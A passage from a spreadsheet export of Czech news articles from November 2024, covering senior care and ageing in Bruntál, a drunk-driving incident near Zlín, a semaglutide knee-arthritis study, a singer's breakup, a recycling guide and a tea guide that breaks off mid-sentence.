a hledáme možnosti, jak péči občanům co nejvíce přiblížit.“ Kraj se také snaží řešit nedostatek ambulantní péče finanční podporou vzniku nových ordinací či obnovy vybavení těch stávajících. O přilákání lékařů na Bruntálsko se snaží i Dobrovolný svazek obcí Bruntálsko propojující čtyřiadvacet obcí v regionu. Ten nabídl lékařům, kteří by se do regionu přesunuli, motivační dotaci ve výši čtyři sta tisíc korun nad rámec krajské podpory, případně i zázemí pro ordinaci za symbolickou cenu. Žádní lékaři však nabídky dosud nevyužili. Jak starosta Horního Benešova a předseda bruntálského svazku Pavel König řekl pro web Region24, problémem je také stárnutí lékařů, kteří poskytují péči v pokročilém věku a hrozí, že péči o jejich pacienty nebude mít po nich kdo převzít. Bruntál také aktivně spolupracuje s nemocnicí v Krnově . „Výsledkem této spolupráce bylo otevření nové zubní ordinace s dvěma křesly v Bruntále . První nová zubní lékařka začala pracovat letos na jaře,“ říká mluvčí Bruntálu Jiří Ondrášek. Alzheimer centra a paliativní péče Muž hraje na harmoniku, žena vedle něj zpívá texty lidových písní. Přidávají se k nim i desítky lidí v důchodovém věku na vozících. Někteří hlasitě, jiní spíše pro sebe, pár z nich má v ruce hudební vajíčko, kterým udržují rytmus. To je obraz, který vidíme při návštěvě bruntálského centra sociálních služeb pro seniory Pohoda. Jde o městskou příspěvkovou organizaci, která je zároveň největším poskytovatelem sociálních služeb pro seniory na Bruntálsku. Provozuje tři pobytové sociální služby, jednu terénní pečovatelskou službu a denní stacionář. Nepřetržitou péči zde nachází více než sto dvacet lidí hlavně z Bruntálu a okolních obcí. V případě, že je místo. „Ze zákona máme povinnost vzít každého, pokud máme volné kapacity, ale klienti pochází hlavně z Bruntálu ,“ říká ředitelka Jarmila Šíblová, podle které chybí v regionu hlavně alzheimer centra a paliativní péče. „My paliativní péči v sociálních službách v nějaké základní míře posledních pět let provádíme, ale v regionu to chybí,“ dodává. Poptávku po paliativní péči a alzheimer centru vnímá i město. Podle Jiřího Ondráška Bruntál v současné době jedná s potenciálním investorem o možné výstavbě domova se zvláštním režimem. S nárůstem kapacit v těchto službách počítá i náměstek hejtmana Moravskoslezského kraje pro sociální oblast Stanislav Kopecký: „V otázce rozvoje kapacit v Krajské síti vycházíme nejen z výstupů krajských příspěvkových organizací působících v sociální oblasti, ale taky z požadavků obcí, které zjišťují potřeby ve svém území a navrhují navýšení kapacit podle aktuální situace.“ Například ve Frenštátě pod Radhoštěm probíhá výstavba domova se zvláštním režimem pro osoby s Alzheimerovou chorobou v seniorském věku. Kraj dokončuje také transformaci Zámku Dolní Životice z ústavního zařízení na menší sociální služby komunitního typu pro osoby se zdravotním či mentálním postižením. A paliativní péči postupně zavádí příspěvkové organizace kraje jako součást poskytovaných služeb. V souvislosti se stárnutím populace kraj očekává také zvýšenou poptávku po domovech pro seniory na celém svém území. Vybudování nových zařízení ale mají v gesci hlavně obce. Podle mluvčího Bruntálu Ondráška jsou současné kapacity úměrné stavebním možnostem zařízení, která ve městě již existují. I proto město nyní neplánuje výstavbu nových domovů pro seniory. „V minulých letech jsme se vydali cestou rozšíření služeb formou realizace denního stacionáře – a jak se ukazuje, tato cesta byla správná, protože v současnosti jsou plně využity kapacity tohoto zařízení,“ vysvětluje Ondrášek. Pohoda pro seniory Kromě dostupné zdravotní a sociální péče zvyšuje kvalitu života také nabídka trávení volného času, od vzdělání po turistiku, ale i naplněné právo na soukromí. Rozdílné lidské návyky a povahy, ale i sexualita seniorů jsou podle ředitelky centra Pohoda Jarmily Šíblové důvody, proč by ve svém zařízení uvítala více jednolůžkových pokojů. I těch je podle ní v regionu nedostatek. „Máme dost dvoulůžkových. Ale ty nejsou úplně nejlépe vnímané. Každý člověk měl jiný život, jinak přemýšlí a když jej v sedmdesáti letech dáte vedle někoho úplně cizího, kdo mu nemusí sedět a mají spolu strávit zbytek života, může docházet k problémům,“ vysvětluje s tím, že pro případ, kdy se „něco pokazí“, mají vyčleněný jeden přechodný pokoj. „Máme ho primárně pro případ, že si dva lidé nesednou. Chceme tak předcházet tomu, aby na pokojích nedocházelo ke střetům než se situace ustálí nebo vyřeší,“ dodává ředitelka, jejíž centrum na svých webových stránkách láká na slogan „Aktivní a důstojné stáří v Pohodě“. Pokoj podle ní může potenciálně sloužit i k naplnění případných sexuálních potřeb. Protože i s tématem sexuality svých klientů se personál centra Pohoda setkává. „Potřeby mají lidé v každém věku. Máme pokyny, jak v případech, kdy se tyto potřeby projeví, postupovat.“ Sociální pracovnice Alice Lileková například vzpomíná, že v centru řešili sexuální asistenci: „Byl tady pán, který opakovaně říkal, že by chtěl ještě zažít s ženou nějakou intimitu. Tak jsme se domluvili, že bychom mu zprostředkovali sexuální asistentku. Pán se těšil, ale dříve než se to stihlo udát, odešel. Odešel ale s pocitem těšení se.“ Spolek proti samotě „Dobrý den, celý den!“ říká muž z Bruntálu , když vchází do místního kontaktního centra pro seniory. „S čím vám mohu pomoci?“ ptá se Irena Mičulková, která má bruntálský Senior Point na starosti. A muž ji odpovídá: „Jdu se na vás podívat.“ Irena Mičulková, foto: Jan Žabka Poté, co dostává tipy na možnosti trávení volného času, rozpovídá se o svém životě. „Na televizi se nedívám, ani na hokej, který je jen samá komerční přestávka. Počítač moc nepoužívám a telefon mám obyčejný. Takže co doma?“ pokládá řečnickou otázku. Jak sám říká, přichází „z nudy“. Přes léto sice tráví hodně času na zahradě, prochází se po okolí nebo si povídá s přáteli, občas ale je třeba “zabít čas” a dostat se více mezi lidi. Podle Mičulkové jde o běžný důvod, proč za ní lidé přichází. „Obvykle dva, tři lidé tady přijdou, aby si prostě popovídali,“ říká. Vždy se snaží příchozí nasměrovat k nějakým aktivitám a událostem ve městě, případně k aktivitám spolku pro seniory, který vede. Spolek Aktivní senioři Bruntálu funguje od roku 2016 a vznikl tak, že se skupina seniorů začala po přednáškách na místní univerzitě třetího věku scházet na víno . S tím, jak se postupně poznávali, začali i pořádat vlastní akce a postupně se rozrůstají o nové členy. Dnes jsou ve spolku desítky lidí, pro které pravidelně organizuje kulturní a sportovní akce či výlety. Hlavním cílem je boj za aktivní stáří a proti samotě. Podle Mičulkové je velkou výsadou spolku propojování starších lidí: „Když někde pracujete, jste součástí kolektivu, navíc často mezi lidmi stejného zaměření. Já dělala v oděvním průmyslu, takže to byly samé švadleny. To v důchodu najednou nemáte. Ale pak přijdete tady a každý vám přinese do života něco nového, protože dříve bych se s nimi nikdy nesetkala.“ Akcí spolku se podle jejích slov účastní lidé, kterým to zdraví dovolí. Pro takové je údajně v Bruntále a okolí v podstatě nekonečné vyžití. „Je to otázka pouze toho, jestli se jim chce. Mohou jít do přírody, do kina nebo tady pro ně je řada jiných aktivit, o kterých se dozví z měsíčníku Moravský Senior. Když někdo ale bude chtít sedět doma, bude sedět doma,“ říká. Zůstává tedy otázka: Co lidé, kterým to zdraví nedovolí? Vstup do 13. komnaty Dřevěná postel s péřovou duchnou je ustlaná. Na stěnách visí náboženské obrazy a na staré skříni vyšívaná utěrka s nápisem: „Kde česká hospodyňka vaří, tam se dobře daří.“ Světle modrá kamna a stejnobarevné jemné vzory na tapetě dodávají pokoji ráz tradičního venkovského stylu. Reminiscenční místnost, foto: Jan Žabka Je to záměr. Tady si totiž sociální pracovnice Alice Lileková z Centra sociálních služeb pro seniory Pohoda povídá se svými klienty a sepisuje jejich životní příběhy. Vrací se do mládí, vzpomínají na první lásky, dovolené v zahraničí, radosti i starosti. „Pomáhá jim to vyrovnat se se životem. Často tady otevřou svou 13. komnatu. A do jisté míry se rozmluví i lidé s demencí. Když je sem vezmu, začnou si vzpomínat,“ říká pečovatelka, kterou podle svých slov baví naslouchat, a proto se začala věnovat reminiscenční terapii a získala k tomu i podporu vedení centra. Při této terapii lidé reflektují svůj život. Vhodná je pro seniory a lidi trpící demencí nebo Alzheimerovou chorobou, protože pomáhá posilovat paměť, sebeúctu a smysl života, přinést radost a ulevit od pocitů izolace či ztráty identity. Sepisování takového příběhu trvá Lilekové někdy i půl roku. Dokončila už spoustu vzpomínkových knih, včetně té od osmdesáti sedmi leté paní Boženy. S ní se na několika sezeních během roku 2021 dostala od jejího pracovitého dětství ve Zlínském kraji přes vztahy v rodině až po chudobinec v její rodné ulici. Paní Božena nejdříve do vyprávění svého příběhu, jak sama přiznává, jít nechtěla. Svůj osud popisuje jako složitý a otevírání starých ran jako bolestivé. „Ale ve chvíli, kdy začnete, rozmluvíte se. Vzpomínala jsem na krásné dětství, jak jsme hráli na četníky a zloděje, nebo na mé rodiče, od kterých jsem nikdy nedostala žádný výprask,“ popisuje s úsměvem na tváři. Alice Lileková a paní Božena, foto: Jan Žabka Pokoj, ve kterém leží, je upravený do domáckého stylu. Všude po stěnách i na komodě má fotografie své rodiny, která za ní pravidelně jezdí. Alice Lileková by chtěla, aby paní Božena mohla své rodině návštěvu někdy oplatit, jenže jí nedělá dobře cesta autem. „Vyřešily jsme to tak, že jsme se tam přenesly přes online mapy, jak je ta aplikace, kde se můžete procházet ulicemi,“ dodává. Poté, co se přestěhovala s rodinou do Bruntálu , na vlastní oči sledovala proměnu města. Stará zástavba se začala předělávat, některé domy zmizely úplně. „Volný čas jsme trávili… volně,“ říká s humorem. Své vyprávění ve vzpomínkové knize uzavírá zamyšlením na závěr: „Když se ohlížím za svým životem, vidím věci, za které si můžu sama, ale i ty, které mi nadělil osud. Tak, jak to v životě chodí, na některé lidi a věci vzpomínám ráda, jiné bych naopak nejraději zapomněla,“ řekla paní Božena Alici Lilekové. Ta se po tomto setkání vydává ke svým dalším povinnostem, kterých je v centru spousta. Před tím ale ještě dodává: „Vidím, že těm lidem vzpomínání prospívá. Říká se, že je dobré si před smrtí udělat pořádek. Toto je způsob, jak ho dosáhnout.“ Když cestou k východu prochází sklepními prostory, Alice Lileková ukazuje na dvoje dveře na konci chodby. „No a tady to končí. Tam je chladící místnost a tam prostor pro pietu, když se rodina chce rozloučit. Přijdete vchodem, odcházíte tudy. Naším úkolem je pomoct ten závěr udělat důstojný.“ Řešení stárnutí - přilákat mladé Popsané výzvy a svědectví přibližují komplexnost stárnutí, jehož kvalitu nelze hodnotit na základě jednoho parametru. Demografické změny v regionu jsou jednou z největších výzev pro Moravskoslezský kraj a jeho obce. To se projevuje i ve snahách samospráv k tématu přistupovat pragmaticky, tvořit dlouhodobé strategie a s realitou stárnutí se vyrovnat, případně ji zvrátit. V oblasti zdravotnictví je aktuální prioritou kraje podle náměstka Gebauera zlepšení dostupnosti ambulantní péče ve všech oblastech. V minulém roce kraj vsadil na takzvanou telemedicínu a zřídil Telemedpointy v pěti obcích v odlehlejších částech kraje, kde je horší dostupnost ambulantní péče. „Tam mají občané možnost bezplatně monitorovat svůj zdravotní stav. V případě alarmujících či kritických hodnot jsou pacientovi doporučeny konkrétní kroky. Tento systém umožňuje zájemcům absolvovat vyšetření v blízkosti svého bydliště bez nutnosti dojíždět do vzdálenějších ordinací,“ říká Gebauer . V sociální oblasti je dlouhodobou prioritou kraje podpora rozvoje služeb, které umožní co nejdelší setrvání lidí ve svém přirozeném prostředí. Jde o pečovatelské služby, osobní asistenci, odlehčovací služby, a také o podporu neformálních zdrojů pomoci, což jsou primárně pečující osoby. „Terénní služby jsou nedílnou a velmi důležitou součástí systému péče o seniory a lidi se zdravotním postižením. Jejich dostupnost i náležitá kvalita je tedy klíčová,“ říká náměstek pro sociální oblast Stanislav Kopecký s tím, že od příštího roku kraj plánuje zahájit přípravu nového Střednědobého plánu rozvoje sociálních služeb na období 2027-2029, který bude reagovat na aktuální situaci v regionu a potřeby občanů. Bruntál zase usiluje o zpomalení negativních trendů demografického vývoje a jeho stabilizaci, co se stárnutí týče. „Byli bychom rádi, kdybychom proces „stárnutí populace“ zpomalili, v ideálním případě zastavili. Aktuálně proto ve spolupráci se státem realizujeme největší investiční projekt v polistopadové historii Bruntálu – zástavbu lokality Za Mlékárnou rodinnými, řadovými a bytovými domy, kde najdou svůj nový domov stovky obyvatel všech věkových kategorií,“ říká mluvčí města Ondrášek, podle kterého jde o klíčový krok k omládnutí města. Vznik textu podpořil Nadační fond nezávislé žurnalistiky Editoval Jakub Šídlo Read more Autor: Jan Žabka Autor person Jan Žabka</t>
  </si>
  <si>
    <t>251</t>
  </si>
  <si>
    <t>20241101_374_3242487751_ba4a9dd3553ab3adec18.html</t>
  </si>
  <si>
    <t>ba4a9dd3553ab3adec18</t>
  </si>
  <si>
    <t>Nebezpečná jízda opilého řidiče na Zlínsku: protijedoucí vozidla před ním uhýbala ze silnice</t>
  </si>
  <si>
    <t>Nebezpečná jízda opilého řidiče na Zlínsku : protijedoucí vozidla před ním uhýbala ze silnice Svůj život i životy dalších lidí riskoval dvaapadesátiletý řidič ze Zlínska , který v úterý ráno usedl za volant, i když těsně před jízdou požil nemalé množství alkoholu . Při jízdě ohrozil všechna protijedoucí vozidla, která kvůli němu musela uhýbat ze silnice, část úseku jel dokonce v protisměru. Jen shodou šťastných okolností se při jeho nebezpečné jízdě nikomu nic nestalo. Oznámení o pravděpodobně opilém řidiči přijali policisté na lince tísňového volání v úterý krátce po sedmé hodině ráno. „ Čtyřiadvacetiletý muž, který jel několik kilometrů za nebezpečně jedoucím řidičem Škody Octavia z Fryštáku směrem do Zlína , sledoval jeho jízdu a informoval o ní policisty, kteří směřovali na místo,“ informovala policejní mluvčí Monika Kozumplíková a dodala, že muž během jízdy ohrozil minimálně čtyři protijedoucí řidiče. Jízda řidiče skončila nárazem do zdi garáže u rodinného domu, kde se snažil zaparkovat. Po příjezdu policistů spal na sedadle řidiče. „ Když ho policisté probudili, dechová zkouška u něj ukázala hodnotu 3,39 promile alkoholu . Přiznal se, že těsně před jízdou vypil nejasné množství tvrdého alkoholu ,“ pokračovala Kozumplíková. Policisté muži zadrželi řidičský průkaz a další jízdu mu zakázali. „ Za ohrožení pod vlivem návykové látky mu v případě odsouzení hrozí trest odnětí svobody až na 3 roky, peněžitý trest a s určitostí teď nějakou dobu řídit nebude,“ dodala policejní mluvčí.</t>
  </si>
  <si>
    <t>50</t>
  </si>
  <si>
    <t>47</t>
  </si>
  <si>
    <t>20241101_375_3242887727_ffa7a6cecb33fe70a116.html</t>
  </si>
  <si>
    <t>ffa7a6cecb33fe70a116</t>
  </si>
  <si>
    <t>Lék proti cukrovce Ozempic zmírňuje bolest kolenní artrózy, ukázala studie Lék proti cukrovce Ozempic zmírňuje bolest kolenní artrózy, ukázala studie</t>
  </si>
  <si>
    <t>Lék proti cukrovce Ozempic zmírňuje bolest kolenní artrózy, ukázala studie Lék proti cukrovce Ozempic zmírňuje bolest kolenní artrózy, ukázala studie 8. listopadu 2024 Původně lék proti cukrovce by mohl pomoci kromě hubnutí i ke zmírnění bolesti. Podle nedávno zveřejněné klinické studie může aktivní látka v lécích Ozempic a Wegovy, určených původně pro léčbu diabetu a hubnutí, výrazně snižovat bolest kolenní artrózy u pacientů s obezitou. Výsledky studie, financované výrobcem léku Novo Nordisk , ukázaly, že pacienti zaznamenali téměř poloviční úlevu od bolesti oproti těm, kteří užívali placebo, píše zpravodajský server The Hill. Studie trvala 68 týdnů a zúčastnilo se jí 407 lidí, z nichž 82 procent byly ženy. Účastníci byli rozděleni do dvou skupin, přičemž jedna užívala aktivní látku semaglutid a druhá placebo. K měření bolesti vědci využili tzv. WOMAC index (Western Ontario and McMaster Universities Arthritis Index), který zahrnuje hodnocení bolesti, pohybových obtíží a funkčnosti při běžných činnostech, jako je chůze do schodů či sezení. Na začátku studie měla skupina účastníků průměrné skóre bolesti 70,9 bodu. Po 68 týdnech užívání semaglutidu se skóre snížilo na 29,2, zatímco u skupiny s placebem bylo 43,4. Skupina užívající semaglutid zaznamenala průměrnou redukci tělesné hmotnosti o 13,7 procenta, zatímco placebo skupina pouze o 3,2 procenta. „U pacientů s obezitou a kolenní artrózou s mírnou až těžkou bolestí vedla léčba jednou týdně injekčně podávaným semaglutidem k výraznějšímu snížení tělesné hmotnosti i bolesti než placebo,“ uvádí závěr studie. Podle Johns Hopkins Arthritis Center mají obézní ženy téměř čtyřikrát vyšší riziko vzniku kolenní artrózy oproti neobézním ženám. U mužů je toto riziko dokonce pětkrát vyšší. Deník The Hill píše, že semaglutid, který patří do skupiny GLP-1 agonistů, byl zkoumán nejen pro léčbu obezity a diabetu, ale i pro možné přínosy při léčbě závislostí, selhání ledvin, onemocnění jater či časných stádií Alzheimerovy choroby. Nejedná se o první podobné zjištění, které se pojí s léky Ozempic či Wegovy, které mimo jiné pomáhají i při hubnutí. Podle studie z Lovola University Chicago, která se zabývá vlivem léků proti obezitě a cukrovce na alkoholiky a drogově závislé, by tyto léky mohly pomoci závislým v boji s opioidy a alkoholem . Výzkum naznačuje, že léky jako je Ozempic, Wegovy nebo Mounjaro, by mohly pomoci snížit míru předávkování opioidy u závislých a snížit intoxikaci alkoholem u alkoholiků. Studie byla publikována v odborném časopise Addiction, píše magazín DailyCaller. Echo24.cz , vhk Autor: vhk Autor person vhk Rubrika transition_slide Homepage</t>
  </si>
  <si>
    <t>179040</t>
  </si>
  <si>
    <t>123730</t>
  </si>
  <si>
    <t>20241101_376_3242496272_f279c7affe2f20869a75.html</t>
  </si>
  <si>
    <t>f279c7affe2f20869a75</t>
  </si>
  <si>
    <t>Anna K. v péči psychologů: Stále se trápí rozchodem. Prozradila, co teď nejvíc nesnáší</t>
  </si>
  <si>
    <t>Anna K. v péči psychologů: Stále se trápí rozchodem. Prozradila, co teď nejvíc nesnáší Zpěvačka Anna K. se v srpnu po 27 letech rozešla se svým partnerem Tomášem Varteckým. Klíčovou roli údajně hrála závislost na drogách a alkoholu . Vartecký se již od té doby stihl oženit, zatímco Anna K. se z rozchodu zřejmě stále nevzpamatovala. MOHLO BY VÁS ZAJÍMAT: Langmajer se nakazil exotickou nemocí, na kterou neexistuje léčba. Narazil jsem, přiznal Na začátku října proto odletěla na dovolenou do Turecka . „Bylo to krásných deset dnů. Četla jsem si konečně knížky, což se mi dlouho nedělo, protože můj mozek se nedokázal vůbec soustředit,“ popsala pro web Super.cz. Dodala, že plavala v nádherném moři a zdravě jedla. „Vracím se do zdravého režimu, cvičím s osobní trenérkou, která za mnou jezdí. Ta mě pořád strašně chválí, což mě samozřejmě motivuje,“ sdělila. Aby vše zvládla, musela prý vyhledat pomoc psychologů. „Starám se i o své duševní zdraví s odborníky, protože to je taky cesta ke zdraví, a není nutné si říkat, že člověk vše zvládne sám. Někdy to totiž možné není, a když vám někdo, kdo má na to seriózní vzdělání, pomůže, jde to vše o moc lépe. Když máte zlomenou nohu, musíte taky k doktorovi a se zlomeným srdcem je to stejné,“ má jasno. Prý si také uvědomuje, že překonat rozchod vyžaduje čas. „Bude asi potřeba hodně trpělivosti a já to slovo už úplně nesnáším, protože ho poslouchám pořád: Musíš být trpělivá, chce to čas atd. Ale tak jdu prostě do toho,“ řekla. MOHLO VÁM UNIKNOUT: Dyková představila nový Hřebejkův film o fake news. Sama jsem nějaké fámy vypustila, přiznala</t>
  </si>
  <si>
    <t>20241101_377_3242493675_50362e1a0f5f11b51e40.html</t>
  </si>
  <si>
    <t>50362e1a0f5f11b51e40</t>
  </si>
  <si>
    <t>Bez odpadu žít neumíme, zkusme ho správně třídit</t>
  </si>
  <si>
    <t>Bez odpadu žít neumíme, zkusme ho správně třídit Nejlepší odpad je ten, který vůbec nevznikne. Měli bychom tedy mít takový přístup k životu, který se označuje slovy Zero Waste , tedy něco jako „bezodpadní hospodaření“. Jenže to se o hodně snáz řekne, než udělá. Ve skutečnosti každý obyvatel ČR vyprodukuje ročně přes půl tuny (zhruba 550 kilo) komunálního odpadu. A to přitom celkem zdatně třídíme, takže do běžných popelnic většinou neházíme skleněné ani plastové lahve, papír, ale ani baterie nebo rozbité elektrospotřebiče. To všechno se dá recyklovat a nějakým způsobem znovu použít. Jenom starých lednic, praček a vysavačů se u nás ročně vysbírá a zrecykluje skoro 13 kilo na obyvatele. Kontejnery určené ke třídění asi všichni známe, neškodí si ale připomenout, jak je správně využívat. Plasty: žlutý kontejner Co sem patří : fólie, sáčky, plastové tašky, sešlápnuté PET lahve, obaly od pracích, čisticích a kosmetických přípravků, kelímky od jogurtů, mléčných výrobků, balicí fólie od spotřebního zboží, obaly od CD disků. Pěnový polystyren sem vhazujeme v menších kusech. Co sem nepatří : mastné obaly se zbytky potravin nebo čisticích přípravků, obaly od žíravin, barev a jiných nebezpečných látek, podlahové krytiny či novodurové trubky, použité obaly od oleje. Jeho zbytky v lahvi totiž mohou velmi zkomplikovat recyklaci. Takovou lahev je třeba nejdřív vymýt teplou vodou a přípravkem na nádobí. Papír: modrý kontejner Co sem patří : časopisy, noviny, sešity, krabice, papírové obaly, cokoliv z lepenky nebo knihy. Obálky s fóliovými okýnky sem lze také vhazovat. Bublinkové obálky vhazujeme pouze bez plastového vnitřku. Nevadí ani papír s kancelářskými sponkami. Ty se během zpracování samy oddělí. Co sem nepatří : uhlový, mastný, promáčený nebo jakkoliv znečištěný papír. Tyto materiály nelze už nadále recyklovat. Pozor! Použité dětské pleny opravdu nepatří do kontejneru na papír, ale do popelnice na směsný odpad! Sklo: zelený kontejner Co sem patří : jakékoliv sklo, např. lahve od alkoholických i nealkoholických nápojů, sklenice od kečupů, marmelád či zavařenin. Patří sem také tabulové sklo z oken a ze dveří. Vytříděné sklo není nutné rozbíjet, bude se dále třídit. Pokud jsou vedle sebe zelený a bílý kontejner, vhazujeme do bílého čiré sklo a do zeleného sklo barevné. Co sem nepatří : keramika a porcelán, autosklo, zrcadla nebo třeba drátované sklo, zlacená a pokovovaná skla. Vratné zálohované sklo patří zpět do obchodu. Nápojové kartony: oranžový kontejner Kontejner na nápojové kartony nemusí být nutně celý oranžový, může být označený jen nálepkou v této barvě. Co sem patří : krabice od džusů, vína , mléka a mléčných výrobků. Co sem nepatří : tzv. měkké sáčky, např. od kávy a různých potravin v prášku. Neodhazujte sem ani nápojové kartony silně znečištěné zbytky potravin. Kovy: šedý kontejner Co sem patří : drobnější kovový odpad, plechovky od nápojů a konzerv, kovové tuby, alobal, kovové zátky, víčka, krabičky, hřebíky, šroubky, kancelářské sponky. Co sem nepatří : plechovky od barev, tlakové nádobky se zbytky nebezpečných látek, domácí spotřebiče a jiná vysloužilá zařízení složená z více materiálů, těžké nebo toxické kovy, jako jsou olovo či rtuť. Nebezpečný odpad Většinu toho, co do třídicího kontejneru nepatří, můžete s klidným svědomím hodit do směsného odpadu. Ovšem třeba plechovky od barev rozhodně ne! Stejně tak nespotřebované léky a pár dalších věcí, které jsou považovány za nebezpečný odpad. Srozumitelným symbolem nebezpečných odpadů je obrázek přeškrtnuté popelnice. Na jejich konkrétní nebezpečné vlastnosti obvykle upozorňují výstražné grafické symboly v oranžovém poli, např. lebka nebo plameny. Ty prozradí, zda je konkrétní věc toxická, žíravá, hořlavá, dráždivá, výbušná či jinak škodlivá. Léky a zdravotnický materiál Patří k nejběžnějším nebezpečným odpadům. Pokud skončí v koši nebo v záchodové míse, mohou kontaminovat vodu či půdu. Prošlé nebo nevyužité léky odneste zpátky do lékárny. Laky, mořidla, nátěry, ředidla Zbytky syntetických barev, ředidel, lepidel, laků, nátěrů, mořidel i jejich obaly mají často více nebezpečných vlastností zároveň. Jak naložit s obalem obsahujícím zbytky těchto látek, se dozvíte z etikety, která doporučuje odevzdat obal na místo sběru nebezpečného odpadu. Tím jsou především sběrné dvory, ale i mobilní sběry pořádané obcemi. Do sběrných dvorů patří i nespotřebované čisticí a úklidové prostředky, které často obsahují dráždivé či jedovaté látky. Elektro Další kategorii nebezpečných odpadů tvoří elektrozařízení. Nejen spotřebiče z domácnosti, ale i baterie a zářivky obsahují řadu nebezpečných látek, jako např. rtuť, těžké kovy či zpomalovače hoření. V chladničkách staršího data výroby se navíc vyskytuje nebezpečný freon. Staré elektrospotřebiče můžete např. odevzdat u prodejců elektra při nákupu nových, odvézt je do sběrného dvora nebo hodit do některého z kontejnerů rozmístěných na veřejných místech. Bývají výrazně červené. Autor: Petr Kotek Autor person Petr Kotek</t>
  </si>
  <si>
    <t>20241101_378_3242496076_a4e1515c98ef5828f018.html</t>
  </si>
  <si>
    <t>a4e1515c98ef5828f018</t>
  </si>
  <si>
    <t>Od zeleného čaje po Pu-erh: kompletní průvodce čajem, jeho druhy a jeho účinky</t>
  </si>
  <si>
    <t>Od zeleného čaje po Pu-erh: kompletní průvodce čajem, jeho druhy a jeho účinky Lukáš Erlebach 1 listopadu, 2024 Čaj je druhý nejvíce konzumovaný nápoj na světě (po vodě) a jeho bohatá historie sahá až několik tisíc let zpátky, přičemž první zmínky o čaji pocházejí z Číny . Čaj nejen potěší smysly, ale je také spojován s celou řadou zdravotních přínosů. Tento článek vás provede hlavními druhy čajů, jejich historickými kořeny, způsoby pěstování, oblastmi původu a tipy na přípravu, která zajistí ten nejlepší chuťový zážitek. Foto: Freepik 1. Zelený čaj Historický původ: Zelený čaj má svůj původ v Číně a Japonsku , kde se pěstuje již přes 4000 let. V Číně byl původně používán jako léčivá bylina, která podporuje zdraví a vitalitu. V Japonsku je zelený čaj úzce spjat s tradiční čajovou ceremonií, kde se stal součástí zenových buddhistických rituálů. Pěstování a oblasti původu: Zelený čaj je dnes primárně pěstován v Číně , Japonsku , Jižní Koreji a na Srí Lance . Při pěstování zeleného čaje se sbírají pouze nejmladší lístky, které jsou následně šetrně zpracovány, aby si zachovaly svou přirozenou zelenou barvu. Lístky se obvykle napařují (v Japonsku ) nebo suší na pánvích (v Číně ). Příprava: Pro přípravu zeleného čaje je klíčová správná teplota vody, která by neměla překročit 70-80 °C. Louhování trvá 2-3 minuty, přičemž je dobré čaj příliš dlouho nenechávat ve vodě, aby nezesládl a nezískal trpkou chuť. K čemu se servíruje: Zelený čaj je tradičně servírován bez přísad, ale lze jej doplnit o lehká jídla jako sushi, rýži nebo saláty. Je skvělým doplňkem pro očistu těla a je oblíbený také jako nápoj při meditacích. Obsah látek: Zelený čaj obsahuje vysoké množství antioxidantů (zejména katechiny) a aminokyselinu L-theanin, která zlepšuje koncentraci a působí relaxačně. Je také mírným zdrojem kofeinu, který stimuluje mysl bez vzniku nervozity jako u kávy. 2. Černý čaj Historický původ: Černý čaj se začal pěstovat v Číně , ale během koloniálních dob se jeho produkce rozšířila do Indie , kde se stal oblíbeným exportním artiklem. V Indii a na Srí Lance se černý čaj pěstuje dodnes, zejména ve slavných oblastech jako Assam a Darjeeling . Pěstování a oblasti původu: Černý čaj je rozšířený především v Indii , Číně , na Srí Lance , v Keni a dalších oblastech. Lístky černého čaje procházejí úplnou oxidací, což jim dodává tmavou barvu a silnou chuť. Příprava: Pro černý čaj se doporučuje voda o teplotě 90-100 °C a louhování po dobu 3-5 minut. Černý čaj snese i delší louhování, které zintenzivní jeho chuť. K čemu se servíruje: Černý čaj je skvělým společníkem k sladkostem, jako jsou sušenky, koláče a další dezerty. V Británii se tradičně servíruje s mlékem, což zmírňuje jeho trpkou chuť. Obsah látek: Černý čaj obsahuje vysoké množství kofeinu, který dodává energii. Obsahuje také antioxidanty (teaflaviny a tearubiginy), které podporují zdraví srdce a cév. 3. Bílý čaj Historický původ: Bílý čaj pochází z Číny , zejména z provincie Fujian , a je považován za jeden z nejvzácnějších a nejméně zpracovaných čajů. Podle legend byl bílý čaj určen pouze pro císaře. Pěstování a oblasti původu: Bílý čaj se sklízí ručně z mladých, jemných pupenů čajovníku, které se následně jen jemně suší na slunci bez oxidace. Oblasti Fujian v Číně a také Assam v Indii jsou dnes známé svou produkcí bílého čaje. Příprava: Bílý čaj je křehký a vyžaduje šetrnou přípravu s vodou o teplotě 70-80 °C, která nepoškodí jeho jemnou chuť. Louhování trvá přibližně 3-5 minut. K čemu se servíruje: Tento čaj je ideální podávat samostatně nebo s lehkými pokrmy, jako jsou saláty či ovoce, aby vynikla jeho jemná chuť. Obsah látek: Bílý čaj je bohatý na antioxidanty, zejména polyfenoly, které pomáhají chránit buňky před poškozením. Má nízký obsah kofeinu, což jej činí vhodným pro jemné povzbuzení. Čajové lístky Foto: Freepik 4. Oolong čaj Historický původ: Původ oolongu leží v Číně , konkrétně v provinciích Fujian a Guangdong. Jeho název znamená „černý drak“ a má úzce spjatou historii s čínskou čajovou kulturou. Pěstování a oblasti původu: Oolong se vyrábí složitým procesem oxidace, kdy lístky procházejí částečnou fermentací. Výsledný čaj se pohybuje mezi zeleným a černým čajem co do chuti i barvy. Příprava: Teplota vody pro oolong se pohybuje kolem 85-90 °C a louhuje se 3-4 minuty. Oolong často snese i několik nálevů, což umožňuje ochutnat různé odstíny chuti. K čemu se servíruje: Oolong čaj je vhodný jako doprovod k jídlům, jako jsou pečené masové pokrmy, rýže nebo zelenina, díky své plné a lehce oříškové chuti. Obsah látek: Tento čaj je bohatý na antioxidanty a látky podporující metabolismus, díky čemuž je často doporučován při snaze o hubnutí. Oolong obsahuje střední množství kofeinu a také aminokyseliny zvyšující soustředění. 5. Pu-erh čaj Historický původ: Pu-erh pochází z čínské provincie Yunnan , kde se vyrábí již po staletí a je známý pro svou fermentaci. Během dynastie Tang (618-907) byl považován za velmi vzácný a ceněný nápoj. Pěstování a oblasti původu: Pu-erh se vyrábí fermentací a dlouhodobým zráním, často i několik let. Zraje jako víno , což přispívá k jeho plné a zemitě bohaté chuti. Příprava: Voda na pu-erh čaj by měla mít 90-100 °C. Louhování může trvat až 5 minut. Tento čaj lze také připravovat opakovaně, a přitom se v něm objevují nové chuťové tóny. K čemu se servíruje: Pu-erh je skvělý k tučným jídlům, jako je maso nebo smažené pokrmy, protože napomáhá trávení. Často je také používán jako očistný nápoj. Obsah látek: Pu-erh čaj obsahuje enzymy, antioxidanty a probiotika, která podporují zdraví trávicího systému. Má mírné množství kofeinu a je oceňován pro své účinky při hubnutí a detoxikaci. Závěr Každý z těchto čajů nabízí jedinečnou chuť a přináší zdravotní 